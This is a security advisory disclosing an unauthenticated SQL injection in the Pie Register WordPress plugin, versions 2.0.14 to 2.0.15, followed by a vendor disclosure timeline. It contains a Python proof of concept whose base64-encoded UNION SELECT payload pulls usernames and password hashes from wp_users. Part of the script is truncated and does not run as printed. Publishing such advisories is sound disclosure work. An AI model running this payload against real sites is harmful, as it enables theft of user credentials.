Pie Register 2.0.14-2.0.15, SQL Injection

User input is not validated correctly when accepting an Invitation Code, as such an SQL Injection attack is possible. This attack is triggered when the parameters ‘show_dash_widget’ and ‘invitaion_code’ are provided to any page, by any user (anonymous or otherwise). The input to the ‘invitaion_code’ parameter are decoded as Base64, and then inserted into the query without using SQL statement preparation, and as a result it is possible to UNION on your own query, as displayed in the PoC below.



CVSS Score


CSSS Vector


Attack Scope


Authorization Required



Uninstall the plugin – or patch manually

Proof of Concept

The below PoC will output a list of Usernames and Hashed Passwords from the current database.

import requests,base64,re

query = "') UNION SELECT (SELECT GROUP_CONCAT(CONCAT_WS(',',user_login,user_pass)) FROM wp_users GROUP BY 1=1),2#"
query_encoded = base64.b64encode(query)
params = {
r = requests.get(url, params=params)

print re.search(r"<tr><td>([^<]*?)<", r.text).group(1)


~$ python g0blin-00040.py


  • 2015-03-16:  Discovered
  • 2015-03-16: Vendor notified
  • 2015-03-17: Vendor responded – already fixed in a pending 2.0.15 release – stated would allow for review prior to release
  • 2015-03-24: Vendor responded – stated new version in testing – will be released mid April
  • 2015-04-13: Update requested from Vendor
  • 2015-04-20: Update requested from Vendor
  • 2015-04-20: Vendor states new version
  • 2015-04-29: Update requested from Vendor – stated reports to be released on Monday due to lack of communication
  • 2015-04-30: Version 2.0.15 released – issue still present – no chance for review given
  • 2015-05-04: Advisory released: